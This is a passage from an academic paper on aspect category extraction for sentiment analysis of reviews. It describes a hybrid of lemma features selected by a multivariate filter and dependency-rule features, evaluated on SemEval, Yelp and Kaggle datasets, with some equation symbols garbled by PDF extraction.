http://dx.doi.org/10.7717/peerj-cs.347 https://peerj.com/computer-science/ suggested a supervised learning method for aspect extraction and classification of sentiments. The classifiers are trained on lexical, morphological, syntactic and semantic features. Baas et al. (2019) introduced a new approach by using SVM with six different pattern classes. This includes lexical, syntactic, semantic, hybrid, and surface feelings. The lexico-semantic patterns were used in the customer reviews to identify aspect-based feeling (ABS). Synset bigram, negator POS bigram, and POS bigram are used to enhance the extraction of aspects based on feelings. Latent Dirichlet Allocation topic model is applied by Amplayo, Lee & Song (2018). This work is an extension of the Aspect and Sentiment Unification Model (ASUM). It considers seller sentiments for aspect extraction and sentiment classification. Seller-aided Aspect-based Sentiment Model (SA-ASM) and Seller-aided Product based Sentiment Model (SA-PBM) are proposed. SA-ASM provides improved results for sentiment classification and SA-PBM for aspect extraction. Al Moubayed, McGough & Hasan (2020) proposed a deep learning approach for topic modelling. Topic modelling is used in this method for extraction of features and it eliminates the need for subject-specific lexicon. Firstly, the dataset is categorized into two categories like positive and negative. Then topic modelling is used to extract features from each class of training dataset that are further given as input to train the stacked denoising autoencoders (SDAs). The overall reconstruction error from each SDA is used by a linear classifier to predict the class. Xu et al. (2019) suggested a new implicit aspect recognition method that relies on non-negative matrix factorization (NMF). This method clusters aspects of a product by merging co-occurrence data with intra-relations of aspects and sentiments. Kim (2018) proposed an advanced semi-supervised system for reducing dimensionality. Weighting and extraction of features are performed in a semi-supervised manner. Kumar, Pannu & Malhi (2020) introduced the aspect based SA using semantic features and deep networks. Domain-specific ontology is generated after preprocessing of review sentences to obtain semantic features. The Word2vec is generated by applying unsupervised neural network to the processed corpus. This vector is used for training CNN model. This method has produced significant results. The CNN model is optimized using particle swarm optimization. The subtasks in ABSA are aspect term extraction, aspect category detection, opinion term extraction, and sentiment analysis. The proposed system is focusing only on aspect category detection. In aspect category detection task aspect terms are important to detect category. If the aspect terms are not specified explicitly then it can be predicted from the opinion words also. Therefore, the proposed system works on lemma features as well as dependency rule-based features. Dependency rule-based features are meaningfully related words in a sentence which support to predict aspect category. The main objectives of this research work are, (i) to examine the effect of feature selection strategy on classification performance, (ii) to examine the effect of dependency rule-based features on the classification performance. The datasets used in this system are SemEval 2014 restaurant review dataset (Pontiki et al., 2016), Yelp and Kaggle datasets. The article is structured as; “Introduction” highlights recent developments in the field of research, proposed method is presented in “Proposed Method”, “Results and Discussion” focuses on results and discussion and concluding remarks is presented in “Conclusions”. Bhamare and Prabhu (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.347 6/22 http://dx.doi.org/10.7717/peerj-cs.347 https://peerj.com/computer-science/ PROPOSED METHOD The technique presented in this article uses a supervised methodology for aspect extraction from review sentences. The datasets used for this research are SemEval 2014 restaurant review dataset, Yelp and Kaggle datasets. SemEval restaurant review dataset contains 3,044 training sentences and 800 test sentences. The restaurant reviews are specified in sentence format. The snippet of the dataset is shown in Fig. 1. This dataset has sentences with the aspect categories like food, ambiance, price, service and miscellaneous/anecdotes. These categories of aspects can be specified explicitly or implicitly. Explicit aspect categories are specified directly in the sentences. For example, in the above snippet, the first sentence is about the food aspect and the aspect is explicitly specified in it. The aspect of the second review sentence is service, but it is not specified explicitly. The word “small tip” specifies it. In reviews, a single sentence may have one or more aspect categories. The aim of this study is to extract aspects from the review sentences and not to decide sentiments. The detailed architecture is demonstrated in Fig. 2. The process of aspect category extraction is elaborated as below. Preprocessing First, the stop words are removed from training and test sentences and then the lemmatization is done. From both datasets, punctuation marks are removed and contractions like can’t, isn’t, etc. are replaced with cannot and is not. Feature extraction In feature extraction, two types of features are extracted from the training dataset and a hybrid feature set is created. The extracted features include: A) Lemma features B) Rule based features C) Hybrid features Figure 1 Example snippet from restaurant review dataset. Full-size DOI: 10.7717/peerj-cs.347/fig-1 Bhamare and Prabhu (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.347 7/22 http://dx.doi.org/10.7717/peerj-cs.347/fig-1 http://dx.doi.org/10.7717/peerj-cs.347 https://peerj.com/computer-science/ A) Lemma features: The process of lemma feature extraction and selection includes the following steps: 1. After preprocessing, the lemmas are extracted from each sentence. A matrix is generated from these lemma features that contain review id, lemma feature, term frequency of each feature and aspect category label. Here, in the corresponding aspect group, term frequency is the number of times the term is present in that aspect category. From this matrix, distinct lemmas with term frequency more than threshold thf in corresponding aspect category are selected. Here, threshold thf is 3. This value is selected based on intuition. 2. Further, a matrix is generated which contains review id, lemma features, its term frequency in each aspect categories and the actual aspect category label. 3. This matrix is considered as a training matrix. During testing, the following process is followed. 1. From each test sentence, lemmas are extracted. 2. For each lemma in the test sentence, a vector from a training matrix for the matching lemma is copied to the test matrix. Figure 2 Proposed system architecture. Full-size DOI: 10.7717/peerj-cs.347/fig-2 Bhamare and Prabhu (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.347 8/22 http://dx.doi.org/10.7717/peerj-cs.347/fig-2 http://dx.doi.org/10.7717/peerj-cs.347 https://peerj.com/computer-science/ 3. The above process is done for all lemma features in a test sentence. Then probability is calculated for each aspect category. The aspect category having the highest probability is given as a category label for the test sentence. In line with the first objective, the above is the base system where features are selected using term frequency only. The same experimentation is carried out using a multivariate filter method of feature selection. In classification problems, an excessive number of features not only increase the computational time but also degrade the accuracy of classification (Abualigah et al., 2017). So it is necessary to extract significant features. These selective features train the machine learning algorithm faster, increases accuracy and avoids overfitting. Methods of feature selection can be classified into categories: filter, wrapper, and hybrid approaches (Labani et al., 2018). In the wrapper method of feature selection, a subset of features is selected to train the machine learning algorithm. Based on the results, the features are added or removed from the set. In the filter approach, feature selection is independent of any machine learning algorithm. Here, features are selected based on statistical tests like Linear discriminant analysis, Analysis of variance, Chi-square etc. Filter methods are classified as a univariate and multivariate feature selection methods. In the univariate method, individual features are assigned a statistical score and top-ranked features are selected. The disadvantage of this approach is that it selects relevant features and ignores redundancy among them as it ignores the relationship between features. In the multivariate method, the relationship between individual features is considered. The combination of filter and wrapper methods is the hybrid method. The proposed system uses a multivariate filter approach. In it, relevant features are selected by means of weighted term frequency score and redundancy is avoided by calculating the Pearson correlation coefficient between features. In the proposed system, similar to the base system, features having term frequency greater or equal to three is selected. Weight is calculated for the selected terms as per Eq. (1). Terms with a weight greater than threshold thwk are selected. Here thwk is the threshold on weight in aspect category k. From these features, a matrix is generated which contains review id, feature, term frequency in all aspect categories and the actual aspect category label. For each feature in an aspect category, the correlation is determined with all other terms in the related category. Features with correlation value that exceeds the threshold thc are not considered because these are highly correlated features that may increase redundancy. The value of threshold thc for this experimentation is 0.85 which is selected through repetitive testing. Similar to the base system, a training matrix is generated using selected features and testing is performed. weight fð Þ ¼ frequency fð Þk total frequency fð Þ (1) The above-stated feature selection strategy enhanced the result of the aspect extraction task compared to the method which uses term frequency-based features only. This feature Bhamare and Prabhu (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.347 9/22 http://dx.doi.org/10.7717/peerj-cs.347 https://peerj.com/computer-science/ selection approach is an extension of the work described in Bhamare, Jeyanthi & Subhashini (2019) where a correlation was calculated using the weight of terms. Here it is calculated using the term frequency of features. B) Rule based features: In this approach, features are selected based on grammatical relationships between words. Stanford NLP parser is used to extract grammatical relationships between words. Sometimes the phrases or related words in a sentence give more information about the aspect compared to the single lemma features. As in Fig. 3, the arrows indicate the relationship between words in a sentence. The parser extracts the features: like restaurant, like food, like I, restaurant this, food tasty, etc. In the first testing, all the dependency relationships except determinant (det) relation are used to extract rule-based features. For each pair of features in an aspect category, its term frequency is calculated and distinct features are selected. Here, term frequency is not applied for feature selection as many dependency relations will not occur regularly. From these selected features, a matrix is generated which contains review id, feature, its term frequency in each aspect category and the actual aspect category label. This matrix is the training matrix. Testing is performed similar to lemma based approach but the difference is that from each test sentence instead of lemma features rule-based features are extracted. In the second experimentation, features are not selected by considering all grammatical rules. Here, the dependency relations which contain any of the nouns, adjectives, adverbs are used to extract features. The rules used are mentioned below (De Marneffe & Manning, 2010): acomp: adjectival complement In a sentence, when an adjectival phrase acts as a complement to the main verb in the sentences it is defined as an adjectival complement. advcl: adverbial clause modifier In a complex sentence, the clause modifying the relationship of the verbal phrases (viz. temporal, conditional, comparative, purpose clause, concessional, manner and result) is identified as an adverbial clause modifier. advmod: adverb modifier In a sentence or phrase an adverb modifier can be defined as a word that modifies a noun, an adjective or a verb; especially in a non-clausal sentence. agent: agent An agent is a word that complements the passive verb in a sentence and is explained further by the use of the preposition “by”. Unlike basic dependencies output, this association is present only in sentences where collapsed dependencies appear. amod: adjectival modifier In a sentence or a phrase, when an adjectival phrase alters the meaning of the noun phrase, it is called as an adjectival modifier. Bhamare and Prabhu (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.347 10/22 http://dx.doi.org/10.7717/peerj-cs.347 https://peerj.com/computer-science/ conj: conjunct A conjunct explains the association between two words that are related and connected by using the co-ordinating conjunctions like “and”, “or”, etc. The conjuncts are treated unevenly; wherein the first conjunct leads and the other conjuncts are dependent on the first by way of relation. cop: copula A copula is a connecting word, particularly a form of a verb that connects the subject and the complement. Copula is often considered to be dependent on its complement. dobj: direct object A direct object is a noun, noun phrase, or pronoun that signifies what or who receives the action of a transitive verb in a clause or sentence. neg: negation modifier A negation modifier identifies the connection between a negation word or phrase and the NP or VP it modifies. nn: noun compound modifier A noun compound modifier refers to a noun in the sentence that provides a better understanding of the head noun and tends to modify it. nsubj: nominal subject A noun phrase is a pro-agent of a clause in a sentence which is also known as a syntactic subject is called a nominal subject. The association in the sentence; unlike standard grammar rules, isn’t controlled by the verb. When there is a copular verb, the root of the clause is the complement of the copular verb which could either be an adjective or a noun. nsubjpass: passive nominal subject When a nominal subject; which is the syntactic subject, is used in a passive voice in a sentence, it is defined as a passive nominal subject. rcmod: relative clause modifier A relative clause that modifies the noun phrase is known as a relative clause modifier. It is placed next to the noun it modified but can also be separated wherein an essential modifier is used. The association moves from the noun phrase to the relative clause; usually by use of a verb. punct nmod dobj det case nsubj amod det I like the tasty food in this restaurant PRP VBP DT JJ NN IN DT NN Figure 3 Dependency relations in a sentence. Full-size DOI: 10.7717/peerj-cs.347/fig-3 Bhamare and Prabhu (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.347 11/22 http://dx.doi.org/10.7717/peerj-cs.347/fig-3 http://dx.doi.org/10.7717/peerj-cs.347 https://peerj.com/computer-science/ xcomp: open clausal complement A predicative or clausal complement (without its own subject) of a verb or an adjective is known as an open clausal complement. The subject in this case is indicated by phrase / words external to the xcomp. The clausal complements are not adjuncts or modifiers and are always non-finite. nmod: Nominal modifier The relationship between the noun / predicate modified by the prepositional supplement and the noun introduced by the preposition is the nmod relation. The testing proves that the system which uses features extracted using selective dependency relations increases the performance compared to the system that uses all dependency relations. C) Hybrid features: In this method, both lemma features and rule-based features are used to obtain a training matrix. The rule-based features are extracted using dependency relations mentioned in section B and Lemma features are selected using the multivariate filter method. The training matrices of both types of features are concatenated to obtain a single training matrix. At the time of testing, from each sentence, both lemma features and rule-based features are extracted and a similar testing process as mentioned for the base system is followed to determine the aspect category label. This experimentation shows that the performance of aspect category extraction is improved if rule-based features are combined with lemma features. Algorithms 1–3 explain the detail process of the proposed hybrid method. RESULTS AND DISCUSSION This research is carried out on datasets such as the restaurant review dataset SemEval, Yelp and Kaggle datasets. For SemEval dataset, Fig. 4 shows the relative percentage of the total number of sentences in the individual aspect category. The distribution of data between the aspect categories in the dataset is not balanced. This affects the performance of the classifier. In this dataset, 34% of sentences are of the food aspect category and that of price category is only 8%. To handle this problem, features are not extracted by considering the dataset as a whole because it will cause selecting features from major categories only. In the proposed work, review sentences are grouped according to the aspect category and then applying the proposed method, features are extracted from each aspect category. This causes to select relevant features from each aspect category. Some of the sentences in the SemEval dataset have more than one aspect category. Fig. 5 represents this distribution. 87% of sentences have unique aspect categories, 11% have two aspect categories in a sentence and 2% have more than two aspect categories in a sentence. The proposed system extracts only one aspect category from each sentence. In the training and testing dataset, sentences having multiple aspect categories are duplicated and assigned unique categories. Bhamare and Prabhu (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.347 12/22 http://dx.doi.org/10.7717/peerj-cs.347 https://peerj.com/computer-science/ The evaluation measure used in this experimentation is F1-score to compare results of different tests. The F1 score (Eq. 2) is calculated from precision and recall. In the Eq. (3) and (4) TP is true positive, FP is false positive, and FN is false negative. F1 ¼ 2 � precision � recall precision þ recall (2) Algorithm 1 Feature selection using multivariate filter method. Preprocessing: stop word removal and stemming is done for all training samples. Input: Frequency[i][j]k is the matrix of features in aspect category k containing the occurrence count (TF) j of feature i. Threshold for TF is thf. Threshold for correlation thc. Output: A Training matrix. Step 1: for every feature f in Frequency[ ][ ] if (Frequency[f]� thf RFrequency.add(f) end for All the selected distinct/unique features are then added to UFrequency[ ][ ] Step 2: for every feature f in UFrequency weight(f)= UFrequency[f][j]/total[f] where total[f] is TF value of that feature in all aspect categories and UFrequency[f][j] is the TF value in that aspect category. if weight(f) >thwk where thwk is a threshold on weight in aspect category k. add f in weighted[f][j] where weighted[f][j] represents the TF of feature f in aspect category j. j represents aspect categories 1..k. end if end for The weight threshold is different for each aspect category. Step 3: A matrix weighted[i][j] is reorganized with i = {t1, . . ,tn} and j={ak1, . . ,ak5} representing 5 aspect categories. Individual row in weighted[i][j] is TF of feature i in ak1 . . ak5 aspect categories. Step 4: for every ti in weighted, compute correlation with other features in aspect category ak cor t½ � ¼ n P X½ �Y½ �ð Þ � P X½ �ð Þ � P Y½ �ð Þffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi n P X2 � P Xð Þ2 � � n P Y2 � P Yð Þ2 � �q end for Compute average correlation for each term and update it in weighted[i][j+1]. Step 5: To avoid redundancy, features are selected based on correlation. for every t in weighted [i][j+1] cor[t]=weighted[i][j+1] if (cor t½ � � thc) then Copy row weighted[t][j] to trainmatrixL[t][l] end if end for trainmatrixL[][] is the training matrix. Bhamare and Prabhu (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.347 13/22 http://dx.doi.org/10.7717/peerj-cs.347 https://peerj.com/computer-science/ Algorithm 2 Feature extraction based on dependency rules. Input: Training dataset Output: A training matrix Step 1: For every sentence S in training dataset D Extract grammatical rule based features using Stanford NLP parser Step 2: For every rule based feature, find its occurrence count in corresponding aspect category. Step 3: For each aspect category, prepare matrix containing distinct rule based features with its occurrence count in that aspect category Step 4: Prepare matrix dptrainmatrixL[i][j] of all rule based features, where i represents the feature/term and j represents its occurrence count in aspect categories {ak1,..,ak5} and the actual category label. Algorithm 3 Algorithm for aspect category extraction using hybrid features. Preprocessing: stop word removal, stemming applied for all test samples. From test samples, punctuation marks are removed and contractions are replaced with words. Input: trainmatrixL[i][j], dptrainmatrixL[m][n], test dataset Output: Aspect label to test sentences. Step 1: Generate hybrid training matrix hybridmatrix[i][j] ) concat(trainmatrixL, dptrainmatrixL) Step 2: Extract lemma and rule based features from individual test sentence Step 3: for every sentence k from test dataset for every feature f of sentence k for every term t in hybridmatrix[t][j] if test feature f = = term in hybridmatrix test[f][1..5]=hybridmatrix[t][1..5] end if end for end for end for Step 4: Calculate the probability of an individual aspect group. Step 5: Aspect group with the maximum probability value is returned as a test sentence label. 34 31 16 11 8 0 5 10 15 20 25 30 35 40 food miscellaneous service ambience price N um be r of s en te nc es (% ) Aspect category Figure 4 Relative percentage of number of sentences in individual category. Full-size DOI: 10.7717/peerj-cs.347/fig-4 Bhamare and Prabhu (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.347 14/22 http://dx.doi.org/10.7717/peerj-cs.347/fig-4 http://dx.doi.org/10.7717/peerj-cs.347 https://peerj.com/computer-science/ precision ¼ TP TP þ FP (3) recall ¼ TP TP þ FN (4) Table 1 shows the F1 score obtained when only lemma features are used. As for lemma features, two feature selection strategies are used: term frequency-based feature selection approach which is a base system and multivariate filter-based feature selection approach. The results demonstrated the first objective that the feature selection approach improves classification performance. Table 1 shows that the multivariate filter method of feature selection has gained more F1 score in all aspect categories compared to the base system. This strategy of feature selection selected relevant features and avoided redundant features whereas the base system focuses on only relevant features and ignores redundancy among features. 0 20 40 60 80 100 1 2 >2 Number of sentences (%) N um be r of a sp ec t c at eg or y p er se nt en ce Figure 5 Representation of number of aspect categories per sentence. Full-size DOI: 10.7717/peerj-cs.347/fig-5 Table 1 F1 score (%) obtained using term frequency based feature selection approach and multivariate filter feature selection approach (SemEval Dataset). Approach Aspects Precision (%) Recall (%) F1-score (%) Term frequency approach of feature selection Ambience 75.51 67.89 71.50 Miscellaneous 66.78 81.12 73.26 Food 85.09 80.54 82.75 Price 81.36 67.61 73.85 Service 77.12 74.68 75.88 Multivariate filter approach of feature selection Ambience 81.31 79.82 80.56 Miscellaneous 81.58 79.83 80.69 Food 88.30 93.67 90.91 Price 87.10 76.06 81.20 Service 87.25 82.28 84.69 Bhamare and Prabhu (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.347 15/22 http://dx.doi.org/10.7717/peerj-cs.347/fig-5 http://dx.doi.org/10.7717/peerj-cs.347 https://peerj.com/computer-science/ Table 2 shows F1-score obtained using approach B. In approach B features are selected using dependency relations. In the first experimentation of approach B, features are extracted by considering all dependency relations. In second, features are extracted by applying selective dependency relations. If all dependency relations are considered to extract features, then it increases redundant features. Also, some irrelevant features get extracted which depreciates the performance of classification. The dependency relations considered here are selective which helps to choose relevant features. Another objective of this research is to analyze the effect of dependency rule-based features on the classification performance. This testing proves that features extracted using selective dependency relations improve the performance of classification. Table 3 shows the outcomes acquired by utilizing the proposed technique. In it, the hybrid features include lemma based features that are selected using a multivariate filter feature selection method and rule-based features that are extracted by applying selective dependency relations. Table 4 displays that the proposed hybrid system has gained 85.24% F1-score which is more than the F1-score attained in Schouten et al. (2017) using the supervised and unsupervised approach. The proposed system attained improved results for the food and ambience aspect categories in comparison to the supervised approach in (Schouten et al., 2017). The unsupervised approach in (Schouten et al., 2017) defines the aspect category taking into account the terms in the sentence. This is the Table 2 F1- score (%) of system using features extracted by applying (i) all dependency relations (ii) selective dependency relations (SemEval dataset). Approach Aspect category Precision (%) Recall (%) F1-score (%) Features extracted considering all dependency relations Ambience 73.42 53.21 61.70 Miscellaneous 65.56 84.98 74.02 Food 85.00 82.73 83.85 Price 76.60 50.70 61.02 Service 74.03 72.15 73.08 Features extracted considering selective dependency relations Ambience 63.81 61.47 62.62 Miscellaneous 70.39 91.85 79.70 Food 87.85 75.67 81.31 Price 78.43 56.34 65.57 Service 74.40 79.11 76.69 Table 3 F1-score (%) in proposed approach using hybrid features (SemEval restaurant review dataset). Approach Aspect category Precision (%) Recall (%) F1-score (%) Proposed system with Hybrid approach Ambience 86.46 76.15 80.98 Miscellaneous 82.57 77.25 79.82 Food 88.86 95.13 91.89 Price 87.69 80.28 83.82 Service 87.73 90.51 89.10 Bhamare and Prabhu (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.347 16/22 http://dx.doi.org/10.7717/peerj-cs.347 https://peerj.com/computer-science/ unsupervised solution as it prohibits the use of labels and generates a collection of seed terms for each aspect category. Using a semantic lexicon like WordNet, the collection of seed terms for each aspect category is created. Fig. 6 shows the precision and recall values obtained using different methods. These approaches are implemented using the SemEval restaurant review dataset. The precision and recall percentage in the proposed system is improved relative to the other methods. In the proposed system, the feature selection method is applied for the lemma features and the selective dependency relations are considered to select dependency rule based features. This encouraged the relevant features to be picked. In addition to this, the use of correlation helped to prevent feature redundancy. The use of relevant features and the elimination of redundancy resulted in increased percentage of precision and recall. Table 4 F1 score (%) obtained using different methods. Approach Precision (%) Recall (%) F1-score (%) SemEval restaurant review dataset Proposed system with hybrid features 86.66 83.86 85.24 (Schouten et al., 2017) Unsupervised approach 76.26 58.48 66.20 (Schouten et al., 2017) Supervised approach 85.58 80.82 83.13 (Brychcín, Konkol & Steinberger, 2014) 85.1 77.4 81.06 Yelp restaurant review dataset Proposed system with hybrid features 83.84 81.93 82.88 (Kiritchenko et al., 2014) (Constrained) 86.53 78.34 82.23 (Panchendrarajan et al., 2017) 70.87 95.83 81.48 Patient reviews on drug (Kaggle dataset) (Rachel, 2018) Proposed system with hybrid features 76.49 80.47 78.43 0 10 20 30 40 50 60 70 80 90 100 Proposed system with hybrid features (Schouten et al., 2017) Unsupervised approach (Schouten et al., 2017) Supervised approach (Brychcín, Konkol & Steinberger, 2014) Pr ec is io n an d re ca ll (% ) Different approaches for aspect category prediction Precision Recall Figure 6 Precision and recall of different methods (SemEval restaurant review dataset). Full-size DOI: 10.7717/peerj-cs.347/fig-6 Bhamare and Prabhu (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.347 17/22 http://dx.doi.org/10.7717/peerj-cs.347/fig-6 http://dx.doi.org/10.7717/peerj-cs.347 https://peerj.com/computer-science/ Methods cited in Fig. 7 used Yelp restaurant review dataset. Table 4 shows that the proposed system has shown improved results on this dataset compared to other methods. In this work, 2524 reviews are randomly selected from Yelp dataset. From this 1755 are used at the time of training and 769 are used for testing. These results obtained by considering categories like restaurant, ambience, food and service. This algorithm is also tested on Kaggle dataset that includes patient reviews on drugs and the aspect categories are disease name. The system yield F1 score 78.43% on Kaggle dataset. For this experimentation, 2100 reviews are randomly selected from Kaggle. CONCLUSIONS In this work, two approaches for the aspect category prediction task are proposed. In the first, a multivariate filter approach of feature selection is offered. This shows that the relevant features increase the performance of classification if redundancy among selected features is reduced. In the second approach, dependency relation based features are selected for aspect category prediction. This approach shows that features extracted using selective grammatical rules improve the performance of classification compared to features extracted using all rules. The hybrid feature set is a combination of multivariate filter based lemma features and selective grammatical rule-based features. The use of hybrid feature set increases the F1 score of aspect detection task to 85.24%. This work can be further extended by adding semantic features and using a combination of supervised and unsupervised approaches. Also, the feature set can be enhanced by adding bi-tagged features. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. 0 20 40 60 80 100 120 Proposed system with hybrid features (Kiritchenko et al.,2014) Constrained (Panchendrarajan R et al., 2017) Pr ec is io n an d re ca ll (% ) Precision Recall Figure 7 Precision and recall of different methods (Yelp dataset). Full-size DOI: 10.7717/peerj-cs.347/fig-7 Bhamare and Prabhu (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.347 18/22 http://dx.doi.org/10.7717/peerj-cs.347/fig-7 http://dx.doi.org/10.7717/peerj-cs.347 https://peerj.com/computer-science/ Competing Interests The authors declare that they have no competing interests. Author Contributions � Bhavana R. Bhamare conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/ or tables, authored or reviewed drafts of the paper, implemented full work, and approved the final draft. � Jeyanthi Prabhu conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, help in Implemention of full work, and approved the final draft. Data Availability The following information was supplied regarding data availability: Data and code are available at GitHub: https://github.com/bhavanaacc/ABSA. SemEval data is available at MetaShare: http://metashare.ilsp.gr:8080/repository/ browse/semeval-2014-absa-train-data-v20-annotation-guidelines/683b709298b811e3a0e 2842b2b6a04d7c7a19307f18a4940beef6a6143f937f0/. This dataset can be accessed after completing the registration process. After registration using Username and Password, one can access the dataset. Under the distribution licence of the dataset provider, the restriction is that the dataset can be used for “Academic Non-Commercial Use, No Redistribution”. Yelp data is available at Kaggle: https://www.kaggle.com/omkarsabnis/yelp-reviews- dataset. Drug data is also available at Kaggle: https://www.kaggle.com/jessicali9530/kuc- hackathon-winter-2018?select=drugsComTest_raw.csv. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.347#supplemental-information. REFERENCES Abualigah LM, Khader AT, Al-Betar MA, Alomari OA. 2017. Text feature selection with a robust weight scheme and dynamic dimension reduction to text document clustering. Expert Systems with Applications 84:24–36 DOI 10.1016/j.eswa.2017.05.002. Afzaal M, Usman M, Fong A. 2019. Tourism mobile app with aspect-based sentiment classification framework for tourist reviews. IEEE Transactions on Consumer Electronics 65(2):233–242 DOI 10.1109/TCE.2019.2908944. Agarwal B, Poria S, Mittal N, Gelbukh A, Hussain A. 2015. Concept-level sentiment analysis with dependency-based semantic parsing: a novel approach. Cognitive Computation 7(4):487–499 DOI 10.1007/s12559-014-9316-6. Ahmad K, Cheng D, Almas Y. 2007. Multi-lingual sentiment analysis of financial news streams. In: 1st International Workshop on Grid Technology for Financial Modeling and Simulation. Trieste: SISSA Medialab 001. Bhamare and Prabhu (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.347 19/22 https://github.com/bhavanaacc/ABSA http://metashare.ilsp.gr:8080/repository/browse/semeval-2014-absa-train-data-v20-annotation-guidelines/683b709298b811e3a0e2842b2b6a04d7c7a19307f18a4940beef6a6143f937f0/ http://metashare.ilsp.gr:8080/repository/browse/semeval-2014-absa-train-data-v20-annotation-guidelines/683b709298b811e3a0e2842b2b6a04d7c7a19307f18a4940beef6a6143f937f0/ http://metashare.ilsp.gr:8080/repository/browse/semeval-2014-absa-train-data-v20-annotation-guidelines/683b709298b811e3a0e2842b2b6a04d7c7a19307f18a4940beef6a6143f937f0/ https://www.kaggle.com/omkarsabnis/yelp-reviews-dataset https://www.kaggle.com/omkarsabnis/yelp-reviews-dataset https://www.kaggle.com/jessicali9530/kuc-hackathon-winter-2018?select=drugsComTest_raw.csv https://www.kaggle.com/jessicali9530/kuc-hackathon-winter-2018?select=drugsComTest_raw.csv http://dx.doi.org/10.7717/peerj-cs.347#supplemental-information http://dx.doi.org/10.7717/peerj-cs.347#supplemental-information http://dx.doi.org/10.1016/j.eswa.2017.05.002 http://dx.doi.org/10.1109/TCE.2019.2908944 http://dx.doi.org/10.1007/s12559-014-9316-6 http://dx.doi.org/10.7717/peerj-cs.347 https://peerj.com/computer-science/ Akhtar N, Zubair N, Kumar A, Ahmad T. 2017. Aspect based sentiment oriented summarization of hotel reviews. Procedia Computer Science 115:563–571 DOI 10.1016/j.procs.2017.09.115. Al Moubayed N, McGough S, Hasan BA. 2020. Beyond the topics: how deep learning can improve the discriminability of probabilistic topic modelling. PeerJ Computer Science 6(1):e252 DOI 10.7717/peerj-cs.252. Al-Smadi M, Al-Ayyoub M, Jararweh Y, Qawasmeh O. 2019. Enhancing aspect-based sentiment analysis of Arabic hotels’ reviews using morphological, syntactic and semantic features. Information Processing & Management 56(2):308–319 DOI 10.1016/j.ipm.2018.01.006. Amplayo RK, Lee S, Song M. 2018. Incorporating product description to sentiment topic models for improved aspect-based sentiment analysis. Information Sciences 454–455:200–215 DOI 10.1016/j.ins.2018.04.079. Anand D, Naorem D. 2016. Semi-supervised aspect based sentiment analysis for movies using review filtering. Procedia Computer Science 84:86–93 DOI 10.1016/j.procs.2016.04.070. Asghar MZ, Khan A, Ahmad S, Qasim M, Khan IA. 2017. Lexicon-enhanced sentiment analysis framework using rule-based classification scheme. PLOS ONE 12(2):e0171649 DOI 10.1371/journal.pone.0171649. Asghar MZ, Khan A, Zahra SR, Ahmad S, Kundi FM. 2019. Aspect-based opinion mining framework using heuristic patterns. Cluster Computing 22(S3):7181–7199 DOI 10.1007/s10586-017-1096-9. Baas F, Bus O, Osinga A, Van de Ven N, Van Loenhout S, Vrolijk L, Schouten K, Frasincar F. 2019. Exploring lexico-semantic patterns for aspect-based sentiment analysis. In: Proceedings of the 34th ACM/SIGAPP Symposium on Applied Computing, 984–992. Benkhelifa R, Bouhyaoui N, Laallam FZ. 2019. A real-time aspect-based sentiment analysis system of youtube cooking recipes. In: Machine Learning Paradigms: Theory and Application. Cham: Springer, 233–251. Bhamare BR, Jeyanthi P, Subhashini R. 2019. Aspect category extraction for sentiment analysis using multivariate filter method of feature selection. International Journal of Recent Technology and Engineering 8(3):2138–2143 DOI 10.35940/ijrte.C4566.098319. Brychcín T, Konkol M, Steinberger J. 2014. Uwb: machine learning approach to aspect-based sentiment analysis. In: Proceedings of the 8th International Workshop on Semantic Evaluation (SemEval 2014). Dublin, 817–822. De Kok S, Punt L, Van den Puttelaar R, Ranta K, Schouten K, Frasincar F. 2018a. Review-aggregated aspect-based sentiment analysis with ontology features. Progress in Artificial Intelligence 7(4):295–306 DOI 10.1007/s13748-018-0163-7. De Kok S, Punt L, Van Den Puttelaar R, Ranta K, Schouten K, Frasincar F. 2018b. Review-level aspect-based sentiment analysis using an ontology. In: Proceedings of the 33rd Annual ACM Symposium on Applied Computing, 315–322. De Marneffe MC, Manning CD. 2010. Stanford typed dependencies manual. Available at https:// nlp.stanford.edu/software/dependencies_manual.pdf. El Hannach H, Benkhalifa M. 2018. WordNet based implicit aspect sentiment analysis for crime identification from Twitter. International Journal of Advanced Computer Science and Applications 9:150–159. Firmanto A, Sarno R. 2019. Aspect-based sentiment analysis using grammatical rules, word similarity and sentiCircle. International Journal of Intelligent Engineering and Systems 12(5):190–201 DOI 10.22266/ijies2019.1031.19. Hu M, Liu B. 2004. Mining and summarizing customer reviews. In: Proceedings of the Tenth ACM SIGKDD International Conference on Knowledge Discovery and Data Mining. 168–177. Bhamare and Prabhu (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.347 20/22 http://dx.doi.org/10.1016/j.procs.2017.09.115 http://dx.doi.org/10.7717/peerj-cs.252 http://dx.doi.org/10.1016/j.ipm.2018.01.006 http://dx.doi.org/10.1016/j.ins.2018.04.079 http://dx.doi.org/10.1016/j.procs.2016.04.070 http://dx.doi.org/10.1371/journal.pone.0171649 http://dx.doi.org/10.1007/s10586-017-1096-9 http://dx.doi.org/10.35940/ijrte.C4566.098319 http://dx.doi.org/10.1007/s13748-018-0163-7 https://nlp.stanford.edu/software/dependencies_manual.pdf https://nlp.stanford.edu/software/dependencies_manual.pdf 